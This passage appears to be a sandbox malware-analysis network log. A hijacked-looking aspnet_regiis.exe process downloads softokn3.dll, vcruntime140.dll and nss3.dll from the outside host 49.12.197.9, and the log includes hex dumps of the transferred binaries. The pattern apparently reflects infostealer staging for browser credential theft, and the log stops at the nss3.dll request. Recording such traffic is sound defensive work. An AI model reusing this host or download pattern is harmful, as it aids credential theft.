                                                                                                                                                                  2024-10-03 01:36:13 UTC16384INData Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01
                                                                                                                                                                  Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
                                                                                                                                                                  2024-10-03 01:36:13 UTC16384INData Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8
                                                                                                                                                                  Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
                                                                                                                                                                  2024-10-03 01:36:13 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c
                                                                                                                                                                  Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|
                                                                                                                                                                  2024-10-03 01:36:13 UTC16384INData Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83
                                                                                                                                                                  Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  14192.168.2.64973649.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:14 UTC196OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:15 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:15 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 257872
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:15 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  2024-10-03 01:36:15 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89
                                                                                                                                                                  Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8
                                                                                                                                                                  Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00
                                                                                                                                                                  Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23
                                                                                                                                                                  Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00
                                                                                                                                                                  Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00
                                                                                                                                                                  Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00
                                                                                                                                                                  Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15
                                                                                                                                                                  Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                                                                  2024-10-03 01:36:15 UTC16384INData Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25
                                                                                                                                                                  Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  15192.168.2.64973749.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:16 UTC200OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 49.12.197.9
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:36:16 UTC261INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:16 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 80880
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Last-Modified: Thursday, 03-Oct-2024 01:36:16 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  2024-10-03 01:36:16 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                  2024-10-03 01:36:16 UTC16384INData Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c
                                                                                                                                                                  Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
                                                                                                                                                                  2024-10-03 01:36:16 UTC16384INData Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01
                                                                                                                                                                  Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                                                                                                  2024-10-03 01:36:16 UTC16384INData Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f
                                                                                                                                                                  Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                                                                                  2024-10-03 01:36:16 UTC15605INData Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f
                                                                                                                                                                  Data Ascii: T@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  16192.168.2.64973849.12.197.94435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:36:17 UTC192OUTGET /nss3.dll HTTP/1.1
